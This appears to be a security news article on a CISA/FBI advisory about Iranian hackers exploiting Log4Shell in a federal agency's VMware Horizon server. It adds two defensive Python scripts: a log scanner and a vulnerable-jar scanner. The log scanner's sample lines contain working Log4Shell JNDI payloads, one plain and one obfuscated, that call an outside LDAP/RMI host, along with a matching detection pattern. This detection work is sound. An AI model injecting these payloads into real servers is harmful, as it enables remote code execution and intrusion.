US govt: Iranian hackers breached federal agency using Log4Shell exploit


The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware.

The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability.

After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency’s network.

“In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” the joint advisory reads.

The two U.S. federal agencies added that any organization that has not yet patched its VMware systems against Log4Shell should assume it has already been breached and should start hunting for malicious activity within its network.

CISA warned in June that VMware Horizon and Unified Access Gateway (UAG) servers are still being preyed upon by multiple threat actors, including state-sponsored hacking groups, using Log4Shell exploits.

Log4Shell can be exploited remotely against any vulnerable server that is reachable, whether from the Internet or from the local network; once attackers have a foothold on such a server, they use it to move laterally across the breached network and reach internal systems that store sensitive data.

Ongoing Log4Shell exploitation by state hackers

After its disclosure in December 2021, multiple threat actors almost immediately began scanning for and exploiting systems left unpatched.

The list of attackers includes state-backed hacking groups from China, Iran, North Korea, and Turkey, as well as access brokers known for their close ties with some ransomware gangs.

CISA also advised organizations with vulnerable VMware servers to assume they were breached and initiate threat-hunting activities.
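The threat-hunting the advisory recommends starts with the web and application logs of the exposed Horizon servers. As an added example, not code from the BleepingComputer article or from the CISA/FBI advisory, the Python script below does the part of that hunt that naive string matching gets wrong: it undoes URL-encoding and collapses the nested-lookup obfuscations (`${lower:j}`, `${::-n}`, default-value tricks) that exploit kits use to hide `${jndi:...}`, then reports the scheme and callback host of every JNDI lookup it finds. The log lines are constructed for illustration, and the function names are my own.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines (not from the advisory). Lines 1 and 2
# carry a plain and an obfuscated JNDI lookup; lines 3 and 4 are benign
# (line 4 contains a non-JNDI lookup, which must not be flagged).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"
10.0.0.9 - - [11/Nov/2022:10:01:05 +0000] "GET /portal/?x=${${lower:j}${::-n}di:${lower:rmi}://203.0.113.7:1099/o} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.12 - - [11/Nov/2022:10:02:17 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
10.0.0.13 - - [11/Nov/2022:10:03:00 +0000] "GET /portal/help?q=price%20${env:HOME} HTTP/1.1" 200 512 "-" "curl/7.79"
"""

# Inner lookup forms that attackers nest to break up the literal "${jndi:".
# Log4j resolves innermost lookups first, so we collapse them the same way.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.I)   # ${lower:j} -> j
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*:-([^{}]*)\}")               # ${::-n}   -> n
# Log4j matches the lookup prefix case-insensitively, hence re.I.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:\s*/*([^/\s}]*)",
    re.I,
)


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode and collapse nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = unquote(text)
        # Case lookups only change letter case; the JNDI match is
        # case-insensitive anyway, so the inner text is kept as written.
        new = _CASE_LOOKUP.sub(lambda m: m.group(2), new)
        new = _DEFAULT_VALUE.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_log(log_text: str) -> List[Dict[str, object]]:
    """Return one record per line that contains a JNDI lookup after normalization."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append({
                "line": lineno,
                "scheme": m.group(1).lower(),
                "callback": m.group(2),      # attacker-controlled host:port
                "normalized": norm[m.start():m.end()],
                "raw": line,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} callback to {hit['callback']}  <- {hit['normalized']}")
```

Run it over real Horizon or UAG access logs by replacing `SAMPLE_LOG` with the file contents; the callback host is the pivot for the rest of the hunt (outbound LDAP/RMI connections from the server to that host, followed by the XMRig and Ngrok artifacts the advisory describes). Note that the normalization only covers the lookup-level obfuscations shown; a header that never reaches the application log will not be caught here, which is why the advisory also asks for host-level hunting.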

VMware also urged customers in January to secure their VMware Horizon servers against Log4Shell attack attempts as soon as possible.

Since January, Internet-exposed VMware Horizon servers have been hacked by Chinese-speaking threat actors to deploy Night Sky ransomware, by the North Korean Lazarus APT to deploy information stealers, and by the Iranian-aligned TunnelVision hacking group to deploy backdoors.

In today’s advisory, CISA and the FBI strongly advised organizations to apply recommended mitigations and defensive measures, including:

  • Updating affected VMware Horizon and Unified Access Gateway (UAG) systems to the latest version.
  • Minimizing your organization’s internet-facing attack surface.
  • Exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in the cybersecurity advisory (CSA).
  • Testing your organization’s existing security controls against the ATT&CK techniques described in the advisory.
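The first mitigation presupposes that you know which hosts still carry a vulnerable log4j-core, and Horizon is far from the only Java product that bundles it. As an added example, not VMware's or CISA's tooling, the Python scanner below walks a directory tree, opens every .jar/.war/.ear/.zip (including archives nested inside a .war), looks for the JndiLookup class that the exploit needs, reads the Maven pom.properties version, and compares it against the CVE-2021-44228 fix releases (2.15.0, plus the 2.12.2 and 2.3.1 backport lines). The sample tree it builds in a temporary directory is constructed; the class-file bytes are placeholders, and the function names are my own.

```python
import io
import os
import re
import tempfile
import zipfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    path: str                 # archive on disk; "!inner" appended for nested archives
    version: Optional[str]    # from pom.properties, None if absent
    vulnerable: bool          # to CVE-2021-44228 according to the version


def parse_version(v: str) -> Optional[Tuple[int, int, int]]:
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) if m else None


def vulnerable_to_44228(version: Optional[str]) -> bool:
    """Fixed in 2.15.0; backported as 2.12.2 (Java 7) and 2.3.1 (Java 6)."""
    v = parse_version(version) if version else None
    if v is None:
        return True            # JndiLookup present but version unknown: verify by hand
    if v[0] != 2:
        return False
    if (2, 3, 1) <= v < (2, 4, 0) or (2, 12, 2) <= v < (2, 13, 0):
        return False
    return v < (2, 15, 0)


def _scan_archive(zf: zipfile.ZipFile, label: str, findings: List[Finding]) -> None:
    names = set(zf.namelist())
    if JNDI_CLASS in names:
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        findings.append(Finding(label, version, vulnerable_to_44228(version)))
    for name in names:                      # recurse into bundled jars (e.g. WEB-INF/lib)
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    _scan_archive(inner, f"{label}!{name}", findings)
            except zipfile.BadZipFile:
                continue


def scan_tree(root: str) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                p = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(p) as zf:
                        _scan_archive(zf, p, findings)
                except zipfile.BadZipFile:
                    continue
    return findings


def build_sample_tree(root: str) -> None:
    """Constructed fixtures: placeholder bytes stand in for real class files."""
    def make_jar(path, version=None, with_jndi=True, extra=None):
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as zf:
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe placeholder")
            if version:
                zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            for name, data in (extra or {}).items():
                zf.writestr(name, data)
    make_jar(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "2.14.1")
    make_jar(os.path.join(root, "lib", "log4j-core-2.17.1.jar"), "2.17.1")
    make_jar(os.path.join(root, "lib", "commons-lang3.jar"), with_jndi=False)
    inner = io.BytesIO()                    # a web app bundling an old log4j-core
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(JNDI_CLASS, b"placeholder")
        zf.writestr(POM_PROPS, "version=2.12.1\n")
    make_jar(os.path.join(root, "webapps", "portal.war"), with_jndi=False,
             extra={"WEB-INF/lib/log4j-core-2.12.1.jar": inner.getvalue()})


def run_demo() -> List[Tuple[str, Optional[str], bool]]:
    """Build the constructed tree, scan it, and return (relative path, version, vulnerable)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        out = []
        for f in scan_tree(root):
            disk, _, nested = f.path.partition("!")
            rel = os.path.relpath(disk, root).replace(os.sep, "/")
            out.append((rel + ("!" + nested if nested else ""), f.version, f.vulnerable))
        return sorted(out)


if __name__ == "__main__":
    for path, version, vulnerable in run_demo():
        print(f"{'VULNERABLE' if vulnerable else 'patched   '} {version or '?':8} {path}")
```

Point `scan_tree` at the install root of each Java service (or at `/` with patience) rather than at the demo tree. Two caveats: a build that shades log4j under a different package name will not match `JNDI_CLASS`, and a 2.15.x or 2.16.x jar reports as not vulnerable to CVE-2021-44228 while still being affected by the follow-on CVEs, so the version column is what you act on, not the flag alone.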

https://www.bleepingcomputer.com/news/security/us-govt-iranian-hackers-breached-federal-agency-using-log4shell-exploit/
